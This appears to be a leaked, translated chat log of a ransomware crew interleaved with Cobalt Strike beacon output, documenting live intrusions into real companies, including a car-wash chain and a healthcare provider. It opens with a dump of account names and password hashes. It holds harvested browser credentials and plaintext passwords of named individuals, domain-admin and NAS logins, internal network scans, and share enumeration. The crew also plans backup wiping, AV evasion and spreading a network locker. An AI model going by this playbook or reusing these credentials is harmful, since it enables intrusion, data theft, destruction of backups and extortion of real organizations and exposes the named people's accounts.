4648 MOIT$ 44ccc7cf02cb8675b9044c63fae7a769 4096 2812 PRH-2621$ 8d4960c3800797d0b5d06e05436f7855 4096 3136 PRH-2620$ 50a089f04febde6876a272349a069f 4096 2617 PRH-0084$ 4dbdc968f6be735671b93ffa8a1ba2fd 4096 4620 PRH-2903$ 8ada3e3d22e8d411b43a63bf69a1a265 4096 7118 PRH-3081$ ec0044e9174328840eb8140e79382bf3 4096 3353 PRH-2966$ 9cb90cb83aa465d24ad8295faab5fe41 4096 6683 PRH-3111$ b58c0252d36b3d1c51f820e7f8d263b4 4096 3241 PRH-2659$ 8f5a4e7a7ed251f2607a0050e322a4c3 4096 3238 PRH-2675$ 52333753086a032fc62ecebc34ae16f7 4096 3244 PRH-2662$ 91239dd34f0ef561349864ff673cb0fe 4096 2867 sschmid 16a29d277d8d2c3716adfe89102348 512 2644 PRH-2135$ d87cc5f450f0c702ba9a4eb8d117a9b9 4096 3020 CLINIC-LENOVO$ 9d276026a118352babecd0608ea9a541 4096 4663 sstorck fc191f14aea279d501e6e7fa4140c489 66048 6701 terickson dae2c852487dccdb6207a51353b6ca01 66048 4685 alharnisch ee098fd8f7bd735743966c13570a0086 66048 4634 PRH-3082$ 5ad42d43a2a22815036142cef8d5972a 4096 7115 PRH-3088$ ae913c8772f0a710609d417487bd45a7 4096 2472 jsplichal 28761d18c08f46ba9e4af80a34a955fe 66048 3311 PRH-2872$ efb1073b10100eea274f43815ee98e1f 4096 4638 kbrown e72d306b4355e39ff4b05212cd98c15a 66048 7133 PRH-3126$ cc8ac6ee166cf04445198e7032796c85 4096 3257 PRH-2670$ a77bae0344da98dfa3c4e8bba73b8af8 4096 3275 PRH-2679$ 2be3023f9c0114ff397e895344212974 4096 3281 PRH-2677$ 5de7f8563add8809eb018d4a34f3644a 4096 3185 PRH-2617$ 178998385c222fea638da8b4a55ebb13 4096 4674 PRH-3122$ 485b0ceca0561b73dd484ce61c27a12a 4096 3268 PRH-2680$ 0ef49b5060537f7c62f5a7fe704f139e 4096 3240 PRH-2658$ a4fb0e802f0ef8f244d6251ad180e19b 4096 2658 mdanelke 4ad6fab667ac92f0f5f3a2e45c8c49da 66048 2745 PRH-2257$ 5a2c8fa3a78cef0747c434cf46a57928 4096 6636 jcarter fc83a57b90d4748f68fd474b4ce0b07e 512 3362 PRH-2923$ 7191c40b33bca86cf240acb63d3cc5da 4096 2782 order eb3c1b2253c1abf545acb0db00704806 66048 3246 PRH-2663$ 77c3176ef2d7642ddac6d85736be174f 4096 7110 PRH-2993$ 350a7dc227a0ecd4c9ad528885f33223 4096 2881 PRH-2702$ 0a3f399eaa21662e57f0695d5c86398f 
4096 3356 PRH-2975$ 1df40826b608198f88479f329b54019f 4096 7123 kmikkelson 4daa86c8f9a4cf8aed1e49513b57a104 66048 3243 PRH-2202$ e4d66e7fb0499f2dff51d72829f0a7b5 4096 6654 PRH-3077$ 8e5c3d07af7cd48e511f551872b6b999 4096 3231 PRH-2119$ 18c1b205ba5c27c68904db362597c5d3 4096 6674 PRH-3131$ 03988e64ab2246df567df22f839d06 4096 3317 PRH-2881$ 20b4ed6e8977599ac239d5cfeb97145c 4096 6692 mwenzel 3a6fbaea894360a3d55b2a21d839a70c 66048 6693 tsyversongrant 3a062933b5976cbff2ab61155bb511b5 512 4639 PRH-3067$ 9ed411ce8029085f69497ccf6a9fe0 4096 7134 PRH-3113$ 73db7c55fea363947cbe6ad5ef5f70e9 4096 3245 PRH-2661$ 328ac1ecc07035afec94cf80163b8c6c 4096 5618 PRH-2678$ c60bf8b519df9b11568b0e7ed28f13f1 4096 3252 PRH-2666$ 870177f36cafe4b0ecaaa13d10dd8355 4096 2854 sdenoble eb3c1b2253c1abf545acb0db00704806 66048 7113 PRH-3076$ 54935d148299e8c40e11c9987b12a96e 4096 3327 PRH-2683$ ffbe9c9af24c640a65681ccddc2de8e9 4096 4629 PRH-2992$ 737e07ed24a35ded2b9691c188e46eac 4096 4615 ewoodke 64f12cddaa88057e06a81b54e73b949b 66048 3042 tracking c39f2beb3d2ec06a62cb887fb391dee0 66048 3242 PRH-2660$ 44caef032b5ced7d2b1d49f7e15e810f 4096 3193 ambulance 74b97c4ce24198d4af22db7910f3ef75 66048 2976 cr 7311df4eac99d671e447bd797ddc8d7f 66048 3259 PRH-2664$ 68846af71a5b1f8995ff99aad561871b 4096 3190 KRIS-PRH-2685$ bacb03d24484cc94f3db1153982ba146 4096 2562 cosborne 581ffce63b88cbab82f6decb9a5eb6a2 66048 3346 PRH-2240$ 50d6f80d816f30e90d2e7cbd1ca3e4af 4096 7605 SPARE-2020$ a2bb2a57c709ea006628818c29dc481d 4096 5614 jennen 5ca241a638da398b2275af36914a1d94 66048 3017 fbackman 2d09850f9d73356e8b229419fa4c8ccb 66048 7128 PRH-3129$ 297208f2af96f7dca6c96087eadb4ba4 4096 7104 PRH2909$ 932ad6e3cc9376702f849f67d1fc6644 4096 2412 jmcnamar 19f8313a6e13e016e7be22cc394be49a 66048 2243 mamundson 54cf67c3581e8f28dac96f5cbff80570 66048 4637 jwulff 63d67b406723fac633524f98d6011302 66048 3357 PRH-2919$ b9a0d8b26f174ac3b12b9a4049ac2ec4 4096 1235 nlarson 64f12cddaa88057e06a81b54e73b949b 66080 2928 acarr 
f25e966e3cbc04a7c274b71457497d34 66048 5612 tnyreen 64f12cddaa88057e06a81b54e73b949b 66048 1239 SLV 64f12cddaa88057e06a81b54e73b949b 66080 6689 STOCK_LS$ c4517504b54f9ef3501ae2d774d4b679 4096 6633 ldivald 64f12cddaa88057e06a81b54e73b949b 66048 2847 crohloff ff366185621b9430eaa0bdd22c34408a 66048 6690 DIVALD-2020$ c39bb181960387e05f9b8feee7f829af 4096 3261 dlesmeister b488feb87b8744f87650c094779a4cfa 512 2324 smartin 39a6ccd7d6d2babdd11650ca3e4f2e7f 66048 3330 JFS-JOHNFSTOCK$ 306104c9fd5a890eda9b3a777fe7f570 4096 2483 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66048 4664 swilson 2dc9c0e9a9dbf55f0945ce24fb5e7fa5 66048 3173 gwenstrom e2d2aadee156f45baa63e6b6d9e1822a 66048 2200 spl 6f70de922592d49a9fd650eff31d3b34 66048 1223 JKR 48b01180c8576019c6fd63ee4dfb1444 66080 2294 jstock a273e25d41c20e4f5c4db65b47ed7593 66048 2585 sschmall 210b68c4a2a5725bd5197f38eff6911a 66048 3294 aseger 3a79a42a68d85d852cd11c2879b8afc0 66048 2336 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048 2794 akowalski d513b1530aad3647fc22f56f8deb33ac 66048 6680 PRH-3112$ 10fb6ab39d766ffcaf49880337f2fe94 4096 3315 PRH-2878$ 36ab8132a68234534f69d2fd9799fe7c 4096 6682 PRH-3116$ 460edfc9c6ac035b6f43ba370b0931ce 4096 2772 cpadmin c817d427000071f7e372e9ee4405f0e1 66048 3345 PRH-1250$ 50c37bce23b29221870fe50c65e1b7ff 4096 1209 bmoore 03096f8607f2f99d8e56d9b63965a2cd 66080 2672 tschmidt 0484108954680796ae055f0a1f4389ac 66048 3041 vlee 6017f27b91078de3dadd26256c5e38bf 512 3068 treadmill 7d60508599c6f6eea2e7957f7482782a 66048 2222 mblair 1eadba7d484394d956fae10223c98a51 66048 3092 MAIL$ 51a02ca6c0fffa13df8ac9f6f298838d 4096 3027 canderson 0c05952f0ef5da033b14ec18bc32d4b1 66048 2626 jdahle 64f12cddaa88057e06a81b54e73b949b 66048 2491 jolsen b35fd07bb31f9518dd01b29a8bc67f13 66048 3094 aathey 32e198b25c1bca58629b6282b4b69ac8 66048 6615 thovde 64f12cddaa88057e06a81b54e73b949b 66048 6608 PRH-3008$ 38202670d12d4c3b61f7b42a8dd5c1f7 4096 3066 PRH-3000$ 996a2fdc1c49fc81a6e39c44ab53edc4 4096 7153 mtoso 
a1bfa9473289b6f10f741d90c0fc0450 512 3318 PRH-2876$ 914627e69b5b63a93f56f2c33bf245c4 4096 3364 ___VMware_Conv_SA___ 7e6680540cba43fd971c160ad4e483d6 66048 7143 DESKTOP-M3CLUMV$ aecc192c549c84e506675e3515bd9872 4096 2137 mwood 679f896c6af8720a9ac9ca7b3fa50d25 66048 2280 kdaly 64f12cddaa88057e06a81b54e73b949b 66048 2836 PRH-2273$ f3a5088e090b552c11e13666165cf1b1 4096 7137 PRH-2790$ 6db68b8974bedd975b742610c00e9e69 4096 2810 PRH-2623$ 35fad9d1f36911e0ebcd46834252e627 4096 6681 PRH-3123$ 5ea86b4846b81644dcfac0537eec0681 4096 3307 PRH-2873$ 0b69c9eff062308d3d3c52403cefa089 4096 2116 PRH-2979$ 72b4fced4bb842a6de5fbc91a8e916fb 4096 4696 AThormodson 99e86640e8059a212fa80d8c99bfa0d2 512 6706 LRH000262$ 41b2e6741584b2f7c92a4768a2b88cde 4096 2228 tha 722dd030aca3a775fe4a3537b412dd2d 66048 1206 chartroom 7ce21f17c0aee7fb9ceba532d0546ad6 66080 2553 nhoffman cb0abaa50a8f3dc4fc24f04548a41389 66048 4657 PRH-3103$ b6bfc4ba92977ca9a9a82e442ab6a157 4096 6617 Lungs d4c31c67a8e1e9c5a901608fc053e86d 66048 5616 bsmith 64f12cddaa88057e06a81b54e73b949b 66048 2515 rlien 2d3bffbe9b944bac2416622293868061 66048 2665 dsperr 30baf37feb6e2f61e0c2ad226b7ec372 66048 4697 mtkerr e20e421380a905858cd7cca7e2334712 66048 3342 sborsgard b3255351d8dfe7cdedf3f552a49146d6 66048 3312 PRH-2874$ ddd0b075c561be1bd6107e1f8089ae48 4096 7108 jthompson cd9537fd09f00f0377c186febc42b3eb 66048 2906 arisbrudt 64f12cddaa88057e06a81b54e73b949b 66048 2326 nolson becedb42ec3c5c7f965255338be4453c 66048 3208 sberg 64f12cddaa88057e06a81b54e73b949b 66048 3096 pgorman 6b8ba5f3aae982855e5551b8c7936d53 66048 7109 rjhoyt e690e3bf09962403b980bb6b81f3df5f 66048 3071 FPSERVER$ 43e376323eadee8b16c7989c8df01359 532480 6699 jtotland 218143d40917d213ef5dd38998ee45e0 66048 2618 ituser ab310ea1a05dc32528c9e5102a26b294 66048 2675 kgerber 14a6939d98f10b267219e6374ef230cd 66048 2880 PRH-2701$ cbb0ca44170500764bbc2b2eef09026b 4096 2669 phaberer 2f7788fa03a3deed9c4b43d6204e8a85 66048 6675 PRH-3125$ dd43b97954bac2493f287d1b19162bc9 4096 3145 
WSERVER3-PC$ 136a1889dbbebaf19fe659acf8737767 4096 2281 RMeichsner 64f12cddaa88057e06a81b54e73b949b 66048 5604 ELEAHSERVER$ 2db5eb12f6f902bcf78ff12f643fa6c2 532480 500 Administrator db74c9408655f77f65b01d248fa459df 66048 2666 krogahn 615f178fd1afa75283f4c023c27035af 66048 3319 PRH-2880$ 8839eda0225bac49e0725b472c16822b 4096 4612 PRH-3001$ 1b6812ece2fbe68b993ac64c3cecb0d2 4096 1202 sos bc73e083d3eb8f3d3e098010a1fd8127 66080 1240 SMA 4e426eb9d160988d2a0f2b5bc0473aa1 66080 1201 lab f52d5c82de6ecc8f7d0b1a9d5ff3672f 66080 3119 PRH-1169$ 3e159cd25b9ba4938cd24b272a0685ba 4096 3297 hdomek 64f12cddaa88057e06a81b54e73b949b 66048 2805 snordby 7ce21f17c0aee7fb9ceba532d0546ad6 66048 2464 PRH-1133$ cff5753db280fd3402e9da745252930b 4096 7157 LRHC$ 81b9f3c594d556c0091c8deff7486dc6 2080 2502 PRH-3041$ f65e3cc24bbb1e480f967fcb22ab63d0 4096 2525 jhotvedt c98a8b1efa7a564c9247411ecfe8d8c0 66048 6668 mruegemer 115694b78a8411438f5a092847b30ebe 512 2907 PRH-2955$ 7d2fde70f0b1c3aa7729bcb564269e57 4096 4687 val 812792a1f13bb10964ed1dfeac78c64b 66048 7129 PRH-2213$ 1a34202f6f4759977ed502055043245a 4096 3045 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66048 4670 PRH-3127$ 393a0c622108d8e097268fa00b79dc30 4096 3176 ELEAHBDC$ f5edff92ccf8406f26597614a5b458ba 532480 2604 SHAREPOINT$ b994bf3a81af1e80dbc57e9b3c8c5958 4096 2311 ELBOW-102$ 7cc5cfe0d26a2c709058399aa1ee070c 4096 5607 PRH-3005$ cfbd8ef7643f720e4fb0e90e88f471e0 4096
through the socks
try here
```
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
```
```
m.lrhc.org 40.112.142.148 Windows Microsoft-IIS 10.0 Microsoft Azure Web App - Error 404
lrhc.org 52.41.140.55 Lake Region Healthcare | Lake Region Healthcare
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
sip.lrhc.org 52.112.192.139 RTC 7.0
smtp.lrhc.org 66.228.239.132
mail.lrhc.org 66.228.239.133
ftp.lrhc.org 66.228.239.137
support.lrhc.org 66.228.239.151 Apache-Coyote 1.1 Web Help Desk
patch.lrhc.org 66.228.239.157
```
his domain creds don't work
he has a saved login)
trying to log in as nelson
nothing so far
how are things with the mail?
calmed down now)
```
beacon> ls C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[*] Tasked beacon to list files in C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[+] host called home, sent: 77 bytes
[*] Listing: C:\Users\cmelliott\AppData\Local\Microsoft\Edge\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
```
give me a listing of the Edge folder)
he uses Chrome
there wasn't any
I don't know what to dump it with
so did he have Edge or not?
```
10.10.220.45:445 (platform: 500 version: 5.1 name: PAULSANDERSON domain: FFMG)
```
not in the browser directory
it looks in the vault
SharpWeb is outdated for Edge, I think
snipermail didn't work?
maybe the password will match, looks like we'll have to brute-force
the developer is unlikely to have access to the backups
this is some developer's machine
`http://pdiprodweb/FocalPoint/Login.aspx` what do we have here?
```
--- Chromium Credential (User: gkeller) ---
URL      : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
--- Chromium Credential (User: gkeller) ---
URL      : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W
--- Chromium Credential (User: gkeller) ---
URL      : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://github.com/session
Username : gkellerww
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU
--- Chromium Credential (User: gkeller) ---
URL      : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
```
```
--- Chromium Credential (User: gkeller) ---
URL      : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
```
if you want hostnames, put the names and IPs locally in the hosts file
the socks doesn't resolve hostnames
again?
although there's hardly a backup system there
```
URL      : https://system.netsuite.com/
```
yeah
lol)
```
URL      : http://wwsql01/
Username : sa
Password : sa
```
```
[*] Beginning Google Chrome extraction.
[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL      : https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL      : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL      : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*
--- Chromium Credential (User: mapusatera) ---
URL      : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X
--- Chromium Credential (User: mapusatera) ---
URL      :
Username : michaelpusatera@gmail.com
Password : 715Drew
--- Chromium Credential (User: mapusatera) ---
URL      : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-
--- Chromium Credential (User: mapusatera) ---
URL      : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH
--- Chromium Credential (User: mapusatera) ---
URL      : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123
[*] Finished Google Chrome extraction.
[*] Beginning Edge extraction.
```
--- Chromium Credential (User: mapusatera) --- URL : https://system.netsuite.com/ Username : mpusatera@sotelsystems.com Password : --- Chromium Credential (User: mapusatera) --- URL : https://login5.silverpop.com/ Username : transact@waterway.com Password : $tqMy2K5%T#r --- Chromium Credential (User: mapusatera) --- URL : http://wwsql01/ Username : sa Password : sa --- Chromium Credential (User: mapusatera) --- URL : https://login.live.com/ Username : map@waterway.com Password : --- Chromium Credential (User: mapusatera) --- URL : http://reportserver.waterway.com/ Username : sa Password : --- Chromium Credential (User: mapusatera) --- URL : https://login5.silverpop.com/ Username : map@waterway.com Password : %0%f#rC!5vJj --- Chromium Credential (User: mapusatera) --- URL : https://mail.datotel.com/ Username : hd@waterway.com Password : Waterway1 --- Chromium Credential (User: mapusatera) --- URL : http://reportserver.waterway.com/ Username : waterway\administrator Password : --- Chromium Credential (User: mapusatera) --- URL : https://signin.quicken.com/ Username : michaelpusatera@gmail.com Password : --- Chromium Credential (User: mapusatera) --- URL : https://www.waterway.com/ Username : michaelpusatera@gmail.com Password : fgSrBr%2#cJx --- Chromium Credential (User: mapusatera) --- URL : https://login.live.com/ Username : michaelpusatera@gmail.com Password : Richie42 [*] Finished Edge extraction. [Done. 
```
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57
```
```
URL      : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
```
`https://mail.datotel.com/owa/`
`customercare@waterway.com Wc#2020!`
`http://192.168.0.10:3000`
`http://192.168.0.9:3000/auth/login?redirect=%2F`
by the way, did you find anything outside the domain?
maybe try snipermail to get into the mail
https://192.168.0.115/ - nimble
did you get into the nimble?
```
BACKUPDVR.waterway.com 192.168.0.46:443 192.168.0.46:80
```
we need to make sure we've found everything
nothing moving here yet?
```
beacon> portscan 192.168.0.119 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```
maybe the replica is off, hence the 100% loss
unreachable, no point
so we need to scan ports from the ones that show loss
from some of them, 100% loss
my inattention (
it's unreachable from some computers
it's `Destination host unreachable`
so what's the catch then*
```
Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.

Ping statistics for 192.168.0.119:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000
```
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:05:54> portscan BACKUP 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on BACKUP
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:06:18> shell ping BACKUP -n 1
[*] Tasked beacon to run: ping BACKUP -n 1
[+] host called home, sent: 47 bytes
[+] received output:

Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.

Ping statistics for 192.168.0.119:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```
```
datavault Waterway727
domainrestore Waterway727
mapusatera Gators1853
Administrator 1853Gators
veeam_admin 99Waterway
Applied Waterway99
DBunte Waterway99
gkeller Waterway76
SEnglert Waterway99!
```
```
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
c9f45ab5e6cc7b11dcf9b3bce3fa64df Gators1853
ee54eb9485bf78494a7074cb7b0513a0 1853Gators
a313f6cf5fb92a96195435f9a6e4b5a9 99Waterway
debd2d79f79e305817da0ec58509d686 Waterway99
debd2d79f79e305817da0ec58509d686 Waterway99
134cee9671bb94bffdaefb6f84f5989d Waterway76
036c9df1839c6adc5e65c74fffdca10b Waterway99!
```
can I have the hashes please?
```
datavault 594d1d0f2355dbd18bab80250cd9a1c4
domainrestore 594d1d0f2355dbd18bab80250cd9a1c4
mapusatera c9f45ab5e6cc7b11dcf9b3bce3fa64df
Administrator ee54eb9485bf78494a7074cb7b0513a0
veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
Applied debd2d79f79e305817da0ec58509d686
DBunte debd2d79f79e305817da0ec58509d686
gkeller 134cee9671bb94bffdaefb6f84f5989d
SEnglert 036c9df1839c6adc5e65c74fffdca10b
```
root Waterway99!
NAS with the backups: 192.168.0.3 Waterway 11915Wnas2179!
```
DA: WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
```
yes, wait...)
maybe also wipe it properly from Linux))
yep
we'll do the same
ctrl+a > delete
that's what we did there too
okay, we'll wipe it then
I thought it was inside))
at the bottom is the navbar from your dedicated box
listen, I have no idea how to look at the admin list on this thing
```
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
```
I went through with smb_login
+
there were no write permissions, right?
everyone got in there only as regular users
it wouldn't even let me look at the shares
and check lateral
it didn't work
we had exactly the same one at Wilsonart
couldn't pull through on it?
yes
his 445 is closed?
great
yeah
like in picture 3
and in the folders there are files like these
like in picture 2
and in it folders like these
NAS
did you get into the backup?
`192.168.0.3\.\Waterway 11915Wnas2179!`
did you try to break into it?
and SQL and telnet are open
```
198.61.195.78:5948
198.61.195.78:1433
198.61.195.78:21 (220 Microsoft FTP Service)
```
should have started with this)
I'll scan the ports now
there was no RDP port there? or 445
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 23:32:52> shell ping raxdb.waterway.com -n 1
[*] Tasked beacon to run: ping raxdb.waterway.com -n 1
[+] host called home, sent: 59 bytes
[+] received output:

Pinging raxdb.waterway.com [198.61.195.78] with 32 bytes of data:
Reply from 198.61.195.78: bytes=32 time=19ms TTL=114

Ping statistics for 198.61.195.78:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
no, why not?
an external admin panel?
I'm trying passwords from the browsers and from mimikatz
nothing on the technicians' machines?
trying passwords on the NAS that TL2 passed along
so what do we have here?
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:59:37> shell net view \\CLEBACKUP2020 /all
[*] Tasked beacon to run: net view \\CLEBACKUP2020 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 5 has occurred.

Access is denied.
```
```
Teemo[PDIPRODWEB]SYSTEM */728|20Dec27 21:54:41> shell net view \\MWEISSDESKTOP /all
[*] Tasked beacon to run: net view \\MWEISSDESKTOP /all
[+] host called home, sent: 60 bytes
[+] received output:
Shared resources at \\MWEISSDESKTOP

Share name                Type   Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                    Disk            Remote Admin
Brother HL-5450DN series  Print
C$                        Disk            Default share
IPC$                      IPC             Remote
print$                    Disk            Printer Drivers
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:01> shell net view \\U20OFFICENEW /all
[*] Tasked beacon to run: net view \\U20OFFICENEW /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \\U20OFFICENEW

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C$          Disk           Default share
E$          Disk           Default share
IPC$        IPC            Remote IPC
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:42> shell net view \\DVRNEWBACKUP20 /all
[*] Tasked beacon to run: net view \\DVRNEWBACKUP20 /all
[+] host called home, sent: 61 bytes
[+] received output:
Shared resources at \\DVRNEWBACKUP20

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C$          Disk           Default share
IPC$        IPC            Remote
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:09> shell net view \\KCNEWBACKUP2020 /all
[*] Tasked beacon to run: net view \\KCNEWBACKUP2020 /all
[+] host called home, sent: 62 bytes
[+] received output:
Shared resources at \\KCNEWBACKUP2020

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C           Disk
C$          Disk  Z:       Default share
IPC$        IPC            Remote IPC
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|20Dec27 21:56:34> shell net view \\WATERWAY43OFFIC /all
[*] Tasked beacon to run: net view \\WATERWAY43OFFIC /all
[+] host called home, sent: 62 bytes
[+] received output:
System error 53 has occurred.

The network path was not found
```
```
http://192.168.0.3:5000 - NAS
NAS (nimble storage) login\pass Administrator\1853Gators
https://192.168.0.42:443
https://192.168.0.43:443
https://192.168.0.75:443
https://192.168.0.77:443
\\192.168.0.164 - inspect the machine for important info
unknown unix servers (esxi?)
192.168.0.10:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
192.168.0.9:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
```
```
192.168.0.159:445 (platform: 500 version: 6.1 name: MWEISSDESKTOP domain: WATERWAY)
192.168.20.2:445 (platform: 500 version: 10.0 name: U20OFFICENEW domain: WATERWAY)
192.168.42.2:445 (platform: 500 version: 10.0 name: DVRNEWBACKUP20 domain: WATERWAY)
192.168.30.2:445 (platform: 500 version: 10.0 name: KCNEWBACKUP2020 domain: WATERWAY)
192.168.43.2:445 (platform: 500 version: 10.0 name: WATERWAY43OFFIC domain: WATERWAY)
```
user9
user8
user4
basically all the machines I can see (the ones in AD) I can connect to or pull over, but I have the feeling I'm missing something or looking in the wrong direction
taking it as a whole, I didn't find vSphere (anything at all I could connect to), didn't find how to disable the AV, and didn't find the cloud backups (stalin said theirs are cloud-based, he mentioned something like that)
so where's the snag?
these are Hyper-V users
`WATERWAY\blauer 11915Admin2179!`
I only found his cleartext
```
mapusatera
Applied
djarden
blauer
```
I checked these users
what do we have here?
so we got spotted
cmd was launching before this
and how did your TPSH work before this?
ok
I'll issue a replacement
let's skip
no
is this one worth trying?
```
Fix 3. Stop the process of the related .dll
```
it's not even there
maybe just disable it?
I'll drag it over, I picked what seemed the most harmless
which is already in the crapper
the main thing is don't wreck their system)
hm
```
Press Win + R on your keyboard
Type in taskschd.msc and press Enter
In the Task Scheduler click on Task Scheduler Library once
Right-click on the BackgroundContainer task and select Delete
```
well, fix2 there
which one?
I think I'll try the second option
https://ugetfix.com/ask/how-to-fix-the-specified-module-could-not-be-found-error-on-windows/
even launching Chrome throws this error
haha
better with an exe
or without an exe
you have to type rundll32.exe through Run, right?
yep
win r > rundll32 ...
I'll build you an exe and a dll, start with the dll
maybe launch rundll through Run?
give me the shellcode, I'll build it
should I build it myself or you through the cool crypter?
+
just don't forget to download via incognito etc.
well, let's try
an exe payload will be dirtier
though what's the point, if the shells don't work...
and download it via a link through Chrome over RDP
host it for download in the cobalt
maybe try an exe payload in the cobalt?
and temp.dll is sitting right there
and the same with this
when I paste the TPSH payload into Run, same error
or win r > cmd /c echo 123 > C:\file.name
win r > TPSH payload
try not launching the GUI variant
win r > cmd
win r > powershell
and how are you using it?
through Run, exactly the same
it should find it that way too
you can type run in the search
ok
I'll rebind now
with win R over RDP this pops up for me
the Run menu will open
try win+r
I tried just via the shortcut from Start, by creating a shortcut
how are you launching it?
launching powershell gives the same
when launching cmd over RDP
Still no sessions?
how's it going with the sessions?
@tl2 maybe you can say something?
@tl1 Any good news?
don't know yet
@tl1 Will there be sessions?
most likely we made noise
and the domain isn't visible...
```
beacon> shell net user nddevbernst /dom
[*] Tasked beacon to run: net user nddevbernst /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.
```
```
System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
```
today almost all the computers are off
the relay gave nothing either
hi
didn't find any web services, no SQL visible either; started the relay and went home)
pt
hi
so what did you get done yesterday in the end?
hi all
either on login or on remove action
it's odd that it's inside the network yet with 2FA
standard practice for all EDR systems, forcing 2FA by default
to the mail?
and 2FA to where?
it's odd that it's inside the network yet with 2FA
I seem to remember 2FA
it flashed by, I think
and the Kaseya admin panel was found, right?
the admin panel wasn't found
the 7 build will wipe 100%
no, here we have Kaseya, which doesn't react to us at all
you have problems with AV here, right?
yeah, the original was https://github.com/djhohnstein/SharpShares
you wrote the software yourselves?
there's no git yet, we're still testing
can I get the original name or a link to the git
and as many threads as you say
there is one, SharpSharesNG can run a batch file on every processed host
will that really be fast? the network is pretty fat, psexec isn't fast, something like a multithreaded tool would be good here?
for all the letters of the English alphabet
then a batch that shares the drive with the label, for the label letters + $)))
but I like your option more
yes, from my point of view it's simply more correct to do it that way
in the batch
and what for?
and I thought you made a loop over the available drives)
so as not to sort out "which one is where"
all possible logical drives are simply listed there
I don't have it, I didn't save it because it's very dumb
psexec across the whole domain?)
I won't even answer that question)
do you have the batch file?
but if we additionally share, we rule out the chance of missing something in the process
on the whole it's the same thing
we map them for priority
the locker works over the network
what for?
so they have to be mapped to a label later anyway?
for absolute access
share ALL drives on ALL PCs
